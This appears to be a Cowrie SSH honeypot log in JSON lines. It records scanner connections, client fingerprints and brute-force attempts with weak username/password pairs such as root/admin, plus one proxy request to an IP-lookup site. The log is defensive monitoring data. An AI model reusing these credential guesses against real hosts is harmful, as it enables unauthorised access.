{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57486,"dst_ip":"1.2.3.4","dst_port":22,"session":"93fdb10392bf","protocol":"ssh","message":"New connection: 212.227.125.160:57486 (1.2.3.4:22) [session: 93fdb10392bf]","sensor":"my-vps","timestamp":"2025-08-28T00:31:26.687494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:31:26.689167Z","src_ip":"212.227.125.160","session":"93fdb10392bf"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T00:31:26.973304Z","src_ip":"212.227.125.160","session":"93fdb10392bf"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:31:34.690226Z","src_ip":"212.227.125.160","session":"93fdb10392bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62695,"dst_ip":"1.2.3.4","dst_port":22,"session":"cffb2d3e1bf8","protocol":"ssh","message":"New connection: 212.227.125.160:62695 (1.2.3.4:22) [session: cffb2d3e1bf8]","sensor":"my-vps","timestamp":"2025-08-28T00:31:42.734023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:31:42.735332Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:31:42.845824Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.login.failed","username":"larissa","password":"larissa","message":"login attempt [larissa/larissa] failed","sensor":"my-vps","timestamp":"2025-08-28T00:31:43.965520Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.login.failed","username":"larissa","password":"larissa1","message":"login attempt [larissa/larissa1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:31:45.090480Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.login.failed","username":"larissa","password":"larissa123","message":"login attempt [larissa/larissa123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:31:46.227710Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.login.failed","username":"larissa","password":"larissa1234","message":"login attempt [larissa/larissa1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:31:47.343297Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.login.failed","username":"larissa","password":"larissa12345","message":"login attempt [larissa/larissa12345] failed","sensor":"my-vps","timestamp":"2025-08-28T00:31:49.160114Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:31:50.276683Z","src_ip":"212.227.125.160","session":"cffb2d3e1bf8"}
{"eventid":"cowrie.session.closed","duration":"103.5","message":"Connection lost after 103.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:12.954246Z","src_ip":"171.243.151.203","session":"96f679207e70"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":35494,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fefb3594db5","protocol":"ssh","message":"New connection: 80.94.95.15:35494 (1.2.3.4:22) [session: 7fefb3594db5]","sensor":"my-vps","timestamp":"2025-08-28T00:32:21.346241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:32:21.347183Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:32:21.398362Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn","message":"login attempt [vpn/vpn] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:21.692801Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"1234","message":"login attempt [vpn/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:22.746130Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"123456","message":"login attempt [vpn/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:24.125399Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"abc123","message":"login attempt [vpn/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:25.181818Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":56274,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd18d128162b","protocol":"ssh","message":"New connection: 171.243.151.203:56274 (1.2.3.4:22) [session: bd18d128162b]","sensor":"my-vps","timestamp":"2025-08-28T00:32:25.445607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:32:25.979349Z","src_ip":"171.243.151.203","session":"bd18d128162b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:32:26.112238Z","src_ip":"171.243.151.203","session":"bd18d128162b"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"abcd123","message":"login attempt [vpn/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:26.241311Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:27.014799Z","src_ip":"171.243.151.203","session":"bd18d128162b"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:27.294045Z","src_ip":"80.94.95.15","session":"7fefb3594db5"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:28.307664Z","src_ip":"171.243.151.203","session":"bd18d128162b"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":58668,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d85857fa07d","protocol":"ssh","message":"New connection: 194.233.79.134:58668 (1.2.3.4:22) [session: 2d85857fa07d]","sensor":"my-vps","timestamp":"2025-08-28T00:32:28.746634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:32:29.461708Z","src_ip":"194.233.79.134","session":"2d85857fa07d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:32:29.462374Z","src_ip":"194.233.79.134","session":"2d85857fa07d"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:31.918652Z","src_ip":"194.233.79.134","session":"2d85857fa07d"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:33.263361Z","src_ip":"194.233.79.134","session":"2d85857fa07d"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":53804,"dst_ip":"1.2.3.4","dst_port":22,"session":"235c7e9ff117","protocol":"ssh","message":"New connection: 171.243.150.245:53804 (1.2.3.4:22) [session: 235c7e9ff117]","sensor":"my-vps","timestamp":"2025-08-28T00:32:41.683877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:32:41.688833Z","src_ip":"171.243.150.245","session":"235c7e9ff117"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-28T00:32:41.811998Z","src_ip":"212.227.125.160","session":"3fac8e77ff3d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:32:41.946806Z","src_ip":"171.243.150.245","session":"235c7e9ff117"}
{"eventid":"cowrie.session.closed","duration":"110.5","message":"Connection lost after 110.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:43.344861Z","src_ip":"212.227.125.160","session":"3fac8e77ff3d"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:32:44.304141Z","src_ip":"171.243.150.245","session":"235c7e9ff117"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.245","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:32:45.196306Z","session":"235c7e9ff117"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:32:45.448985Z","src_ip":"171.243.150.245","session":"235c7e9ff117"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:45.689336Z","src_ip":"171.243.150.245","session":"235c7e9ff117"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57960,"dst_ip":"1.2.3.4","dst_port":22,"session":"002ce0e802ba","protocol":"ssh","message":"New connection: 217.72.205.35:57960 (1.2.3.4:22) [session: 002ce0e802ba]","sensor":"my-vps","timestamp":"2025-08-28T00:32:53.537332Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:32:53.538707Z","src_ip":"217.72.205.35","session":"002ce0e802ba"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":57116,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9d1315a403e","protocol":"ssh","message":"New connection: 171.243.151.203:57116 (1.2.3.4:22) [session: a9d1315a403e]","sensor":"my-vps","timestamp":"2025-08-28T00:33:36.992697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:33:36.993878Z","src_ip":"171.243.151.203","session":"a9d1315a403e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:33:38.033027Z","src_ip":"171.243.151.203","session":"a9d1315a403e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49706,"dst_ip":"1.2.3.4","dst_port":22,"session":"360ff878f715","protocol":"ssh","message":"New connection: 212.227.125.160:49706 (1.2.3.4:22) [session: 360ff878f715]","sensor":"my-vps","timestamp":"2025-08-28T00:33:41.608097Z"}
